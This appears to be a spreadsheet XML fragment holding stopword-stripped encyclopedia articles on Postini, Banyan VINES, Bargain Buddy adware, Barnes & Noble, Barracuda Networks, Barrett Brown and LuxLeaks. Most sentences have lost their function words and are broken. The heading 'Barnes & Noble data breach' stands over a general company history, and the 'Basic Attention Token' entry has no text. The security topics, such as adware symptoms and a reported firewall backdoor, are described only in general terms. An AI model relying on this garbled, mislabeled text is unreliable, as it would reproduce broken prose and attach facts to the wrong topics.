    <t>postini e-mail, security, archiving service owned google since 2007. provided cloud computing services filtering e-mail spam malware (before delivered client's mail server), offered optional e-mail archiving, protected client networks web-borne malware. history postini startup company founded 1999 shinya akamine, gordon irlam, brian maggi, scott petry redwood city, california, united states. backed august capital, second-round funding august well summit partners accelerator fund microsystems. february 2005, operating u.s. data centers, processing billion e-mail messages weekly, providing anti-spam services 4,200 companies million users, including workers merrill lynch, circuit city, rayovac, hormel foods, company makes spam, canned meat product". later 2005 moved nearby carlos, california. 2012, number processed emails estimated doubled around times, google added data centers better serve european customers. july 2007, google announced signed definitive agreement acquire postini. google paid $625 million cash acquisition.the former company's services marketed "google postini services". september 2011, google announced would discontinue number products, including google security, acquired google part postini. august 2012, google announced would shutting postini's services folding service's users google apps. after multi-year migration effort, last customers migrated google apps second half 2015. also list mergers acquisitions google exchange online protection, competing product microsoft cisco email security appliance, formerly ironport, competing product cisco references</t>
  </si>
  <si>
    <t>Banyan VINES</t>
  </si>
  <si>
    <t>banyan vines discontinued network operating system developed banyan systems computers running at&amp;t's unix system vines acronym virtual integrated network service. like novell netware, vines's network services based xerox stack. james allchin, later worked group vice president platforms microsoft retirement january 2007, chief architect banyan vines. vines technology vines runs low-level protocol known vip—the vines internetwork protocol—that essentially identical lower layers xerox network systems (xns) protocols. addresses consist 32-bit address 16-bit subnet 48-bit ethernet address route machines. this means that, like xns-based systems, vines support two-level internet. routing algorithms, however, sets vines apart systems level. differentiator, (address resolution protocol), allows vines clients automatically network addresses. when client first boots broadcasts request subnet asking servers, respond suggested addresses. client uses first respond, although servers hand "better" routing instructions client network changes. overall concept resembles appletalk's aarp system, exception vines requires least server, whereas aarp functions peer-to-peer. like aarp, vines requires inherently "chatty" network, sending updates status clients servers internetwork. rounding lower-level system, vines uses (the routing table protocol), low-overhead message system passing around information changes routing, determine address nodes system. these closely resemble similar systems used xns-based protocols. vines also includes (the internet control protocol), uses pass error-messages metrics. middle layer level, vines uses fairly standard software. unreliable datagram service data-stream service operate essentially identically vines adds reliable message service well, hybrid offers guaranteed delivery single packets. banyan offered customers tcp/ip extra cost option owners standard vines servers. this extra charge tcp/ip vines servers continued long tcp/ip server availability become commoditized. topmost layer, vines provides standard file print services, well unique streettalk, globally consistent name service. using globally distributed, partially replicated database, streettalk meld multiple widely separated networks single network allows seamless resource-sharing. accomplishes rigidly hierarchical naming-scheme; entries directory take form item@group@organization (similar naming format used clearinghouse directory service: item:group:organization). this applies user accounts well resources like printers file servers. protocol stack vines client software vines client software runs pc-based operating systems, including ms-dos earlier versions microsoft windows. lightweight client, hence remained latter half 1990s many older machines could networking stacks. this occurred server side well, vines generally offers good performance, even mediocre hardware. initial market release with streettalk's inherent bandwidth requirements, global companies governments grasped advantages worldwide directory services seamlessly spanning multiple time zones recognized vine's technological edge. users included companies, power companies, public utilities—and u.s. government agencies including state department, treasury department, department agriculture, department health human services department defense. u.s. state department early adopter vines technology. able take advantage high-speed modems telephonic connectivity developed world limited telephone modem speeds baud analog telephone systems third world, vines linked embassies around world. vines also features built-in point-to-point group chat capability useful basic communication secure lines. defense department adoption late 1980s, marine corps searching simple, off-the-shelf worldwide network connectivity rich built-in email, file, print features. 1988, marine corps standardized vines garrison (base) forward-deployed ground-based battlefield email-centric network operating system. using ground-based secure radio channels satellite military tactical phone switches, marine corps ready first test vines: 1990-1991 gulf war. units able seamlessly coordinate ground, naval, strikes across military boundaries using chat function pass target lists adjust naval fire fly. ground fire support coordination agencies used vines command channels—from battalion-to-regiment division-to-corps squadron-to-group aircraft wing-to-corps, well peer-to-peer unit communication. vines competitors decade, banyan's competitors, novell microsoft, dismissed utility directory services. consequently, vines dominated came called "directory services" space 1985 1995. while seeming ignore vines, novell eventually microsoft—companies flat server domain-based network model—came realize strategic value directory services. with little warning, novell went playing value directory services announcing own: netware directory services (nds). eventually, novell changed mean novell directory services, renamed edirectory. windows 2000 however, microsoft included active directory, ldap directory service based directory exchange mail server. while vines limited three-part name, user.company.org, like novell's structure, active directory bound naming convention. active directory features additional capability vines lack, "forest trees" organizational model. combination better architecture marketing company size microsoft doomed streettalk, vines finally banyan itself. decline late 1990s, vines's once-touted streettalk services's non-flat, non-domain model lost ground newer technology, despite built-in messaging, efficiency onetime performance edge. banyan unable market product beyond initial base multi-national government entities. company lost ground networking market, vines sales dropped. banyan increasingly turned streettalk differentiator, eventually porting stand-alone product offering interface ldap systems.banyan continued operate closed this required hardware manufacturers submit hardware driver requirements banyan could write drivers peripheral. when open systems published apis began appear, banyan alter model. this made difficult client-side support handle explosive growth example, printers. competitors began adopt vines's outstanding wide area networking protocols services, manufacturers less inclined send unit banyan vines specific drivers competitors allowed write own. dropping banyan brand epresence 1999, general internet services company, firm sold services division unisys late 2003 liquidated remaining holdings switchboard.com subsidiary. version history 1984: banyan vines 1989: banyan vines 1990: banyan vines 1991: banyan vines 4.11 1992: banyan vines 1994: banyan vines 5.50 1997: banyan vines references resource banyan vines bamertal publishing banyan vines coldtail.com</t>
  </si>
  <si>
    <t>Bargain Buddy</t>
  </si>
  <si>
    <t>bargain buddy adware program developed exact advertising. bargain buddy software monitors internet usage displays advertisements based websites user views. software also display exact advertising programs fungamedownloads photogizmo. method infection variants program downloaded browser helper object (bho) part software bundles internet, free downloads games, wallpapers screensavers. bargain buddy also known cashbackbuddy, bullseye software, exact searchbar navisearch. affected operating systems bargain buddy known infect computers running microsoft windows operating system, specifically integrating internet explorer browser. following windows systems infected: windows 2000 windows windows windows windows windows server 2003 windows symptoms infection typical installation, following files created: bbchk.exe bargains.exe. registry also modified software runs system startup. removal exact advertising insists users attempt remove bargain buddy exact advertising products add/remove programs applet, control panel. symantec released tool help remove program. also removed tools spyware doctor, norton family security products, spybot search destroy. also rogue software adware references external links symantec bargain buddy removal tool</t>
  </si>
  <si>
    <t>Barnes &amp; Noble data breach</t>
  </si>
  <si>
    <t>barnes noble booksellers american bookseller. fortune 1000 company bookseller largest number retail outlets united states. july 2020, company operates retail stores across u.s. states.barnes noble operates mainly barnes noble booksellers chain bookstores. company's headquarters fifth avenue york city.after series mergers bankruptcies american bookstore industry since 1990s, barnes noble stands alone united states' largest national bookstore chain. previously, barnes noble operated chain small dalton bookseller stores malls announced liquidation chain. company also nation's largest manager college textbook stores located near many college campuses division spun separate public company called barnes noble education 2015. during covid-19 pandemic, barnes noble 500% profit graphic novel manga sales.the company known customers large retail outlets, many contain café serving starbucks coffee consumables. most stores sell books, magazines, newspapers, dvds, graphic novels, gifts, games, toys, music, nook e-readers tablets. they offer publishing self publishing services. history 19th century: foundations barnes noble began 1886 bookstore called arthur hinds company, located cooper institute cooper union building york city. fall 1886, gilbert clifford noble, then-recent harvard graduate westfield, massachusetts, hired work clerk.in 1894, noble made partner, name shop changed hinds noble. 20th century: expansion 1900–1919 1901, hinds noble moved 31–35 15th street.in 1917, noble bought hinds entered partnership william barnes, friend charles barnes; name store changed barnes noble soon after. charles previously opened book-printing business wheaton, illinois, 1873, named barnes-wilcox company; william barnes, however, divested ownership interest father's business shortly partnership noble. (his father's company would become follett corporation.) although flagship store featured motto "founded 1873," barnes-wilcox company never connection barnes noble, save fact partly owned different times) william barnes. 1920–1939 1930, noble sold share company william barnes' son, john wilcox barnes. noble died june 1936, 1932, height great depression, bookstore moved flagship location 18th street fifth avenue, served company's flagship location closure 2014. noble family retained ownership associated publishing business, barnes noble opened publishing division 1931. 1940–1959 1940, store first businesses feature muzak, underwent major renovation following year. that decade, company opened stores brooklyn chicago. william barnes died 1945, john wilcox barnes assumed full control. company underwent significant expansion 1950s 1960s, opening additional retail store 23rd street manhattan, well shops near city university york, harvard, northeast college campuses. 1960–1979 john barnes died 1964, company sold conglomerate amtel years later. business purchased 1971 leonard riggio, credited founders, $1.2 million. then, mismanaged consisted significantly reduced wholesale operation single retail location—the flagship store fifth avenue." publishing operation sold separately amtel harper row. 1974, barnes noble became first bookstore chain advertise television year later, company became first bookseller united states discount books, selling york times best-selling titles publishers' list price. between 1970s 1980s, barnes noble opened smaller discount stores, eventually phased favor larger stores. they also began publish books sold mail-order customers. these titles primarily affordable reissues out-of-print titles selling mail-order catalogs allowed barnes noble reach customers nationwide.in november 1974, editors british-produced guinness book records, claimed television program record breakers fifth avenue store barnes noble overtaken london's foyles bookshop become world's biggest bookstore. 1980–1999 barnes noble continued expand throughout 1980s, purchased primarily shopping mall-based dalton chain dayton hudson 1986, estimated $275 million $300 million. solveig robinson, author book society: introduction print culture, wrote purchase "gave [barnes noble] necessary know-how infrastructure create what, 1992, became definitive bookselling superstore." acquisition dalton bookstores turned company nationwide retailer, fiscal year 1999, second-largest online bookseller united states. b&amp;n's critics claim contributed decline local independent booksellers. last dalton stores scheduled close january 2010.in 1989, barnes noble purchased 22-store chain bookstop. september 1993, barnes noble became publicly traded company issuing million worth stock york stock exchange ticker symbol. company remained stock exchange august 2019 elliot management purchased company's stock took company private. before barnes noble created official website, sold books directly customers mail-order catalogs. first began selling books online early videotex service called "trintex", joint venture sears ibm, company's website launched 1997. barnesandnoble.com went public 1999. 21st century: operating electronic environment 2000s 2004, reported reading books decline america, number non-reading adults increasing million 1992 2002. despite this, barnes noble claimed retail store business expanding book market. beginning 1999, barnes noble owned gamestop, video game electronics retail outlet. company distributed shares gamestop late 2004, spinning company attempt simplify corporate structure.ceo leonard riggio stepped 2002, naming younger brother former acting chief executive barnesandnoble.com, stephen riggio, succeed him. some corporate governance experts noted appointment could potentially cause conflict interest, company board noted riggio's experience company made right person job. stephen riggio stepped position 2010. 2010s 2010, website president william lynch named ceo. credited helping launch company's electronic book store overseeing introduction electronic book reader, nook. many observers appointment underscoring importance digital books barnes noble's future. steve riggio stayed vice chairman. when lynch resigned mid-2013, replaced chief financial officer michael huseby early next year. following spinoff barnes noble education, huseby departed head firm; place filled mid-2015 ronald boire, departed year later. demos parneros named barnes noble's chief executive officer april 2017 joined company chief operating officer november 2016; however, fired july 2018 "company policy violations" without severance immediately removed company's board, advice firm hired barnes noble. august 2018, parneros filed lawsuit barnes noble, claiming wrongful termination.after bankruptcy closure chief competitor, borders group, 2011, barnes noble became last remaining national bookstore chain united states. this followed series mergers bankruptcies american bookstore industry since 1990s, also demise waldenbooks, barnes noble's subsidiary dalton, crown books, among others. barnes noble's largest physical bookstore rival books-a-million, operate western barnes noble also faces competition general retailers, especially amazon.com, regional independent booksellers. amazon even opened physical bookstores, creating second national bookstore chain.barnes noble began reducing overall presence 2010s, closing original flagship store early 2014. mid-2014, company announced would separate nook media division retail store division.in february 2018, barnes noble permanently laid 1,800 full time employees annual cost savings million year. according techcrunch, company essentially fired entire full time staff stores, would making average $22,000 year (~$11 hour), replaced part time workers earning close minimum wage.in 2018 fiscal year ended july, company overall losses reached million.in early july 2018, barnes noble fired demos parneros unspecified violation company policy, later revealed sexual harassment claims. accused pareneros breaching duties loyalty good faith acting "faithless servant" sexually harassing female employee, bullying subordinates, attempting "sabotage" potential acquisition york-based company, asserted company therefore entitled claw back salary, bonus, benefits period "disloyal conduct".on october 2018, board directors announced would entertain offers company. among potential buyers leonard riggio, owned time approximately barnes noble stock. result news, company's stock price jumped nearly 30%.in august 2019, elliott management corporation acquired company approximately $683m james daunt, managing director london-based waterstones booksellers ltd., becoming ceo. james daunt waterstones barnes noble relocate london york. august 2019, barnes noble became privately held, wholly owned subsidiary elliott. 2020s march 2020, barnes noble announced would temporarily stop selling magazines and, likewise temporarily, close stores covid-19 pandemic. around shops closed good since elliott advisors' acquisition company, daunt plans change acquisition process, initial frontlist orders made centrally smaller numbers previous years. 2021, announced release 10-inch android-based tablet, named nook partnership lenovo, lenovo manufacturing device. april, 2022, york times reported company used temporary closure stores pandemic refurbish them, credited daunt turning around sales store online. publishing barnes noble maintains separate publishing business addition retail stores entities. barnes noble's publishing company start reissuing inexpensive versions out-of-print books, made push expand unit 2003. company success following year; september 2004, book, "hippie," reached york times best seller list.barnes noble often publishes sells books lower cost competitors, sells lines inexpensive books like barnes noble classics leather-bound barnes noble collectible classics collection published since 1992. addition, company second paperback series called barnes noble library essential reading. barnes noble's edition gentle verbal self-defense suzette haden elgin, sold 250,000 copies, reissued edition columbia history world john garrity, sold million copies.the company expanded business acquiring several firms years, including j.b. fairfax international 1999, sparknotes, educational website publishing company, 2001 sterling publishing 2003. food service 1993, barnes noble signed agreement serve starbucks coffee existing future cafes. 2004, barnes noble began offering wi-fi café area selected stores, using freedomlink (now at&amp;t wi-fi network). stores offered wi-fi 2006 july 2009, wi-fi offered free customers. 2016, barnes noble announced plans open four concept stores 2017 featured cafés twice size usual food spots, well bars offering wine beer. restaurants would also include waitstaff full menu breakfast, lunch, dinner. restaurants expected revive sales growth. company executives planned open additional concept stores sales expectations. first stores opened scarsdale, york; edina, minnesota; plano, texas; folsom, california. community involvement barnes noble hires community business development managers engage community outreach. barnes noble also gives back community increase literacy education. barnes noble located fairbanks, alaska gave $80,000 community 2015 2018 book fair fundraising programs. promote nationwide literacy among graders encourage reading summer, barnes noble implemented summer challenge. barnes noble review barnes noble review online magazine, hosted barnes noble's website, publishes evaluations fiction nonfiction works, along essays, interviews, pieces topics. launched october 2007 barnes noble steve riggio james mustich jr., publisher book catalog common reader. regular contributors magazine included book critics michael dirda, brooke allen, laura miller, adam kirsch, well prominent writers fields outside literary criticism, political journalists chris hayes ezra klein, philosopher grayling, music critic robert christgau, cartoonist ward sutton. miller, written salon mustich's common reader, said, "the reviews bnr] anywhere else", adding tone length pieces evoke york times book review rather less formal salon. magazine's traffic flourished first years. according compete.com, amassed 50,000 unique visitors december 2009.some critics originally skeptical barnes noble review. winslow, former literary editor nation, said barnes noble brand name, bnr's contributors effectively endorsing corporation, motives behind publication undermine integrity: "criticism's content free commercialism. barnes noble found another sell books, that's review. write there." mustich disputed idea magazine serves corporate tactic: counter skepticism quality. people read site, determine purport they never tried influence judgment. first attempt would last." barnes noble nook barnes noble nook (styled nook) suite e-book readers developed company, based android platform. first device announced united states october 2009, released november 2009, $259. june 2010, barnes noble reduced nook's price $199, well launched wi-fi-only model, $149, released nook colored touch screen $249.the nook competes amazon kindle, kobo ereader, e-reader offerings color tablets reading apps, apple's ibooks devices. various nook models feature 6-inch, 7-inch, larger touchscreen. version nook introduced wi-fi connectivity, browser, dictionary, chess, sudoku games, separate, smaller color touchscreen serves primary input device. nook also features read store capability allows visitors stream read book hour shopping barnes noble bookstore. according june 2010 cnet article, company planned expand feature include periodicals near future. color version nook introduced 7-inch color touchscreen ability view portrait landscape orientation.on april 2012, microsoft invested $300 million 17.6% stake nook, valued business $1.7 billion.in november 2012, technology publications mashable techdirt criticized license agreement barnes noble sells ebooks consumers, pointing rights re-download purchased ebook expire customer's credit card expires, valid credit card must added account restore functionality.in june 2014, barnes noble previously announced would spin nook digital division separate publicly traded company, 2016, nook remains part barnes noble. that month, company announced partnership samsung electronics make nook tablets, bookseller moved forward plans revamp digital business. samsung barnes noble introduced samsung galaxy nook august 2014, followed samsung galaxy nook 10.1 october 2014. december 2014, barnes noble announced ended nook partnership microsoft buying back stake. samsung barnes noble continue introduce nook tablets.in march 2016, barnes noble announced would close nook store nook video close nook store march continue sell e-books well digital magazines newspapers college bookstores february 2015, barnes noble announced plans spin college bookstore assets create separate company called barnes noble education. august 2015, barnes noble education, inc. began trading york stock exchange ticker symbol, "bned". company operated stores dedicated selling college textbooks, campus.in june 2016, barnes noble education completed acquisition promoversity, custom merchandise supplier e-commerce business works collegiate bookstore business customers.in february 2017, barnes noble education acquired textbook exchange, major textbook distributor based columbia, missouri, $174.2 million cash.by december 2018, barnes noble education operated managed campus bookstores contracts.in july 2019, barnes noble education revealed company turned several offers california-based capital finance take company citing offers capital "substantially undervalued bned, highly conditional credible." unlike former parent company, bned diversifying business acquisition many digital services companies increase number services offered digital student solutions division past four years independent company. digital student solutions division march 2016, barnes noble education enlarged digital student solutions online services division acquiring loudcloud systems, digital platform analytics provider clients higher education, for-profit sector, k-12 segment.in august 2017, barnes noble education acquired student brands $58.5 million.in august 2018, barnes noble education acquired paperrater, service helps students write papers identify plagiarism. also book stacks unlimited bookselling list book distributors list bookstore chains list group-0 isbn publisher codes references further reading kirkpatrick, david (july 1999). "barnes noble's jekyll hyde". york magazine. trachtenberg, jeffrey (april 2014). "what's barnes noble's survival plan? former cuts holding 20%, says, 'the story isn't written yet'". wall street journal. archived ghostarchive wayback machine: rise fall barnes noble. cnbc. november 2018. barnes noble splitting businesses (again) external links media related barnes noble wikimedia commons official website barnes noble filing barnes noble 18th street bookstore (flagship store)</t>
  </si>
  <si>
    <t>Barracuda Networks</t>
  </si>
  <si>
    <t>barracuda networks, inc. company providing security, networking storage products based network appliances cloud services. company's security products include products protection email, surfing, hackers instant messaging threats spam, spyware, trojans, viruses. company's networking storage products include filtering, load balancing, application delivery controllers, message archiving, firewalls, backup services data protection. history barracuda networks founded 2003 dean drako (founding ceo), michael perone, zach levow; company introduced barracuda spam virus firewall year. 2007 company moved headquarters campbell, california, opened office arbor, michigan.in january 2006, closed first outside investment million sequoia capital francisco partners.on january 2008, barracuda networks sued trend micro open source anti-virus software clam antivirus, trend micro claimed violation patent 'anti-virus detection smtp gateway'. addition providing samples prior effort render trend micro's patent invalid, july 2008 barracuda launched countersuit trend micro claiming trend micro violated several antivirus patents barracuda networks acquired ibm.in december 2008, company launched brbl (barracuda reputation block list), proprietary dynamic list known spam servers, free public blocking spam gateway. soon opening brbl many addresses blacklisted without apparent reason without technical explanation.as october 2009, barracuda 85,000 customers. november, 2011, barracuda 130,000 customers. january, 2014, barracuda 150,000 customers worldwide.in 2012, company became co-sponsor garmin-barracuda protour cycling team entitlement sponsor 2011 indianapolis champion bryan herta autosport indycar series, lotus driven alex tagliani, defend team's championship.barracuda networks expanded research development facility arbor 12,500 square foot office building depot street 2008. 2012, michigan-based research division grown employees, outgrowing space. june, 2012, barracuda signed lease occupy 45,000 square foot office complex previously used borders headquarters maynard downtown arbor.in july 2012, dean drako, barracuda networks's co-founder, president since founded 2003, resigned operating position, remaining company's board directors. time drako's departure, company stated achieved profitability, nearly ongoing annual percent growth rate since inception, 150,000 customers worldwide, nearly 1,000 employees, offices, business countries. company created office started search.in november 2012, long-time executive william "bj" jenkins joined company president ceo. jenkins worked since 1998 recently served president emc's backup recovery systems (brs) division. november 2013, barracuda networks went public york stock exchange ticker symbol cuda.in march 2015, barracuda networks expanded business north asia distributed tritech distribution limited hong kong.in november 2015, barracuda added next generation firewall firewall family.barracuda announced future discontinuation copy cudadrive services 2016.in november 2017, private equity firm thoma bravo announced taking barracuda networks private $1.6 billion buyout. february 2018 thoma bravo announced completed acquisition.in april 2022, announced signing agreement purchase barracuda networks thoma bravo billion, completed august year. products chronological order: email security gateway october 2003, barracuda announced spam virus firewall plug-in appliance. june 2008, barracuda launched spam virus firewall large enterprises isps. security gateway april 2005, company introduced filtering appliance prevent spyware viruses gathering transmitting user data, control surfing. load balancer november 2006, company introduced load balancing appliance high availability distribution network traffic across multiple servers. message archiver july 2007, company introduced message archiving index preserve emails, meet legal regulatory compliance. remote access november 2008, company launched secure sockets layer virtual private network product provide secure, clientless, remote access. application firewall announced february 2008, securing applications large enterprises address regulation compliance dss. link balancer announced september 2008, optimize aggregate internet connections different providers, currently life. barracuda backup november 2008, company announced service back data cloud, including on-site backup data deduplication off-site data replication disaster recovery. january 2009, barracuda added message-level backup microsoft exchange novell groupwise, integrating barracuda backup service yosemite backup, formerly tapeware. security service october 2009, conjunction acquisition purewire, barracuda networks launched purewire security service software service offering filtering, content security, safe surfing. nextgen firewall february 2010, barracuda announced nextgen firewalls protect enterprise network infrastructures. firewalls integrate email filtering, intrusion prevention, layer application profiling, network access control platform centrally managed across multiple distributed enterprise network locations. nextgen firewalls available hardware appliance, virtual appliance public cloud instance. product includes wide area network traffic optimization. cudatel communication server (pbx) august 2010, barracuda announced release cudatel, voip private branch exchange designed administrators. cudatel features freeswitch, open-source project sponsored barracuda networks. copy.com announced cloud storage service february 2013. service discontinued 2016. barracuda sentinel june 2017, barracuda launched artificial intelligence service prevent spear phishing cyber fraud. barracuda mobile device manager end-of-life announced december 2017. free service launched 2014.[2] acquisitions september 2007, barracuda networks acquired netcontinuum, company providing application controllers secure manage enterprise applications.in november 2008, barracuda networks expanded cloud-based backup services acquiring bitleap.in november 2008, barracuda networks acquired 3sp, allowing company introduce secure sockets layer (ssl) virtual private network (vpn) products allow secure remote access network file shares, internal sites remote control capabilities desktops servers.in january 2009, barracuda networks acquired yosemite technologies software agents incremental backups applications microsoft exchange server server, windows system states.september 2009, barracuda networks acquired controlling interest phion austria-based public company delivering enterprise-class firewalls.in october 2009, barracuda networks acquired purewire inc, software service (saas) company offering cloud based filtering security.in april 2013, barracuda networks acquired signnow.in 2014, barracuda networks purchased systems uk.in october 2015, barracuda networks acquired intronis.in november 2017, barracuda purchased sonianin november 2017, barracuda announced acquired private equity investment firm thoma bravo, llc.in january 2018, barracuda acquired phishline. controversies security issue january 2013, backdoor discovered: variety firewall, vpn, spam filtering gear sold barracuda networks contains undocumented backdoor accounts allow people remotely access sensitive information, researchers austrian security firm warned." backdoor secured shortly announcement. reputation emailreg.org april 2009, emailreg.org published notice clarifying whitelist domains impact barracuda blog lists. april 2010 blog entry appeared alleging barracuda networks spam blocking deliberately targets non-spamming addresses tries sign email whitelisting service "emailreg.org". 2019 emailreg.org announced longer accepting customers would continue services existing customers notice. emailreg.org discontinued services shortly thereafter longer operation. 2020 warning appears addresses. also comparison file hosting services comparison file synchronization software comparison online backup services references external links official website</t>
  </si>
  <si>
    <t>Barrett Brown</t>
  </si>
  <si>
    <t>barrett lancaster brown (born august 1981) american journalist, essayist, activist former associate anonymous. 2010, founded project group used wiki analyze leaks concerning military-industrial complex, labeled "criminal organization" department justice. late 2020, brown restarted project pm.in january 2015, brown sentenced months federal prison crimes accessory fact, obstruction justice, threatening federal officer stemming fbi's investigation 2012 stratfor email leak. prosecutors previously brought charges associated sharing link leaked stratfor data, charges dropped 2014. part sentence, brown also required almost $900,000 stratfor restitution.in november 2020, brown claimed asylum basis persecuted journalism. brown says 2021 overheard officers discussing sealed charges arrested london allegedly overstaying visa incitement offenses. early life education brown born grew dallas exhibited early interest writing journalism, creating newspapers family's computer attending preston hollow elementary school. went contribute school newspapers, interned several weekly newspapers teenage years. attended episcopal school dallas sophomore year high school, spent would-be junior year tanzania father residing business. while africa, brown completed high school online texas tech university program, earning college credits well high school diploma. 2000 enrolled university texas austin spent semesters taking writing courses leaving school pursue full-time career freelance writer. journalism 2010, brown began work crowdsourced investigation wiki, project labeled "criminal organization" department justice. brown's count, project members peak communicated chat room published findings project wiki. group huge amounts hacked files emails intelligence contractors, hoping expose companies like hbgary stratfor, earning trust hacktivist community.in june 2011, project released exclusive report surveillance contract called "romas/coin" discovered e-mails hacked hbgary anonymous. consisted sophisticated data-mining techniques leveraging mobile software aimed arab countries. after project shutdown 2012 arrest incarceration, restarted late 2020 seeking asylum uk.from september 2012, incarceration, brown wrote series columns magazine titled "the barrett brown review arts letters jail". 2015 transitioned intercept. 2016 intercept national magazine award three barrett's columns. 2019 burned national magazine award protest intercept closing snowden archives.in 2017, brown launched pursuance project, aimed unite transparency activists, investigative journalists, foia specialists hackivists fully encrypted platform. brown said pursuance would take hacktivism future, letting anyone sort troves hacked documents even recruit teams hackers. pursuance's goal offer task management automation environment collaborative investigations surveillance state. 2018, brown raised $50,000 pursuance project kickstarter. february 2020, brown shut pursuance project down, writing pursuance would resume work later year funded settlements libel suits. pursuance software last updated october 2018 available demo github.in december 2020 update, brown said used money able make prototype. also discussed starting abusing methamphetamines year half earlier, noting elevated work ability wreak havoc elements press police agencies. also discussed going rehab. brown said drug time rehab reason pursuance updated, project back hiatus.in 2018, brown removed courage foundation's beneficiary list criticism julian assange. organization's director quit protest.brown written daily beast, vanity fair, true/slant, huffington post, guardian, skeptical inquirer, whowhatwhy, outlets. association anonymous november 2011, brown said names members zetas drug cartel would released member anonymous group kidnapped free. brown says member released truce drug cartel moment. others said kidnapping fake, noting lack details police reports.some media outlets presented brown self-proclaimed spokesperson anonymous, disputes, saying doesn’t work way." 2011, brown announced gregg housh, another former member anonymous, signed contract estimated $100,000 amazon write book tentatively titled anonymous: tales from inside accidental cyberwar. book never released, brown said podcast spent money.brown said renounced links group 2011. december 2011, brown told reporters anonymous hacked millions emails stratfor christmas would released wikileaks. arrests trial march 2012, executed search warrants brown's apartment mother's house seeking evidence alleged crimes. items seized included "records relating hbgary, infragard, endgame systems, anonymous, lulzsec, chats, twitter, wiki.echelon2.org, pastebin.com." during search, agents took possession laptop computers. brown confirmed twitter raided residence receiving information hector xavier monsegur (also known sabu), founder lulzsec.the seized laptops included less 3,000 pages chat logs march 2011 february 2012. these chats produced evidence trial jeremy hammond brown's trial. journalists familiar evidence brown said total number pages chat logs tens thousands, potentially revealing contacts hackers sources thought speaking confidence.on september 2012, brown arrested dallas county, texas threatening agent youtube video. arrest occurred left computer linked tinychat raid could heard background. brown talked publicly history using heroin going withdrawal arrest. magistrate denied bail judged danger safety community risk flight." october 2012, federal grand jury indictment returned brown charges threats, conspiracy retaliation federal enforcement officer. various tweets, youtube uploads comments made brown arrest cited support within indictment.on december 2012, brown indicted additional federal charges related december 2011 hack austin-based private intelligence company stratfor. trove millions stratfor emails hack, including authentication information thousands credit card, shared hacker collective lulzsec wikileaks. brown faced years federal prison allegedly sharing link data part project january 2013, third indictment filed brown counts obstruction concealing evidence march 2012 raid mother's homes. brown's mother sentenced november 2013, months probation $1,000 fine misdemeanor charge obstructing execution search warrant.as september 2013, brown federal court-issued order; lawyers allowed discuss case media, lest taint jury. assistant united states attorney candina heath said brown tried manipulate media behind bars benefit, brown's attorney "coordinates and/or approves media," publicity brown contained false information "gross fabrications". defense counsel maintained order unfounded unwarranted breach brown's first amendment rights.in march 2014, charges brown dropped. april 2014, reported brown agreed plea bargain.the government introduced additional chat logs seized brown's laptop sentencing attempt frame central figure anonymous stratfor hack. this caused delays, defense given prior access. january 2015, brown sentenced months prison. also ordered $890,250 fines restitution. journalist janus kopfstein accused government making false statements attempt convict brown. much brown's december sentencing hearing spent drawn-out arguments definitions project brown himself.brown released prison november 2016, moved halfway house five drug dealers close downtown dallas, texas. april 2017, brown arrested held unknown charges four days. after released, gave interview democracy now! house arrest, despite pressure government speak media.in 2021, arrested east london, since november 2020 claim asylum, allegedly overstaying visa incitement offenses related holding protest banner said: "kill cops." original request asylum 2020 based claim persecuted journalism. 2021, claimed overheard officers discussing sealed charges arrested london. subpoena legal fund donor information 2017, lawyers donors brown's legal fund filed suit assistant united states attorney candina heath filing subpoena wepay resulted divulgence identities. lawyers argued irrelevance donor information case brown provision information directly special agent robert smith federal bureau investigation rather prosecutor judge trial donors' belief information intended surveil harass donors activity protected u.s. constitution, filed destruction data monetary damages. october 2017, judge maria elena james denied motion dismiss case introduced department justice. social media bans brown's twitter account, @barrettbrown_, permanently banned twitter four times remains banned. joked holds record twitter permanent bans. first three bans overturned. according counterpunch journalist, bans prompted brown posting said proof rape woman, described twitter errors journalists inquired, fourth not. fourth final prompted brown tweeting assange trial would "deserve other, cleaner hands" knew erik prince's alleged ties roger stone.brown's twitter account pursuance project also banned evasion platform manipulation falsely reported, according daily dot. mental health brown talked publicly history drug use, including heroin suboxone early 2010s methamphetamines late 2010s early 2020s. june 2022 interview, brown said "done drugs major national outlets," still used suboxone.in 2022, accused friends working prison, attempting commit suicide. according brown, episode resulted suffering complex post-traumatic stress disorder. twelve days later, brown said mostly recovered. press arts relatively free documentary film released 2016 field vision brown's drive across texas halfway house released prison.barrett brown's case included plot point season u.s. series house cards input brown's friend fellow anonymous member, gregg housh.according npr, elliot series robot based brown drug addict can't access emotions."brown serves advisory board international modern media institute. also references further reading greenwald, glenn (march 2013). "the persecution barrett brown fight it". guardian. retrieved april 2021. ludlow, peter (july 2013). "jailed journalist barrett brown faces years reporting hacked private intelligence firms". democracy now! (interview). interviewed goodman. retrieved april 2021. færaas, arild (september 2013). "amerikansk journalist risikerer fengsel". aftenposten norwegian). retrieved april 2021. external links text united states brown available from: digital media project</t>
  </si>
  <si>
    <t>Basic Attention Token</t>
  </si>
  <si>
    <t>LuxLeaks</t>
  </si>
  <si>
    <t>luxembourg leaks (sometimes shortened leaks luxleaks) name financial scandal revealed november 2014 journalistic investigation conducted international consortium investigative journalists. based confidential information luxembourg's rulings pricewaterhousecoopers 2002 2010 benefits clients. this investigation resulted making available public rulings three hundred multinational companies based luxembourg. luxleaks' disclosures attracted international attention comment avoidance schemes luxembourg elsewhere. this scandal contributed implementation measures aiming reducing dumping regulating avoidance schemes beneficial multinational companies. judicial aspects case concern persons charged luxembourg justice participating revelations. multinational company charged. luxleaks trial took place spring 2016 condemnation whistleblowers. appeal trial's judgment delivered march 2017 confirmed condemnation. following appeal, luxembourg higher court rendered january 2018 distinct judgment defendants fully granted whistleblower status them. revelations waves icij revelations november 2014, washington, d.c.–based international consortium investigative journalists (icij) released luxleaks investigation. eighty journalists media organizations around globe involved collaboratively reviewing 28,000 pages documents. documents available online searchable database categorized industry corporation published icij websites. documents disclose rulings luxembourg companies worldwide aiming reducing payments. luxembourg leaks provide insight rulings, dating 2002 2010. december 2014, icij revealed names large companies benefiting rulings avoidance schemes luxembourg. this second wave labeled "luxleaks complement first revelation wave november labeled "luxleaks luxleaks revelations worldwide impact, icij partnered investigations many media around world: cnbc (usa), (canada), irish times (ireland), monde (france), tagesanzeiger (switzerland), süddeutsche zeitung (germany), asahi shimbun (japan), confidencial (spain) many others. after publishing luxleaks investigation, icij awarded united states' journalism awards, george polk awards business reporting category (icij jointly awarded investigations) february 2015. icij also awarded 'investigation year' luxleaks swissleaks investigations data journalism awards june 2015.although icij luxleaks wikileaks show similarity names operating mode international, online, non-profit, journalistic organisations publishing confidential 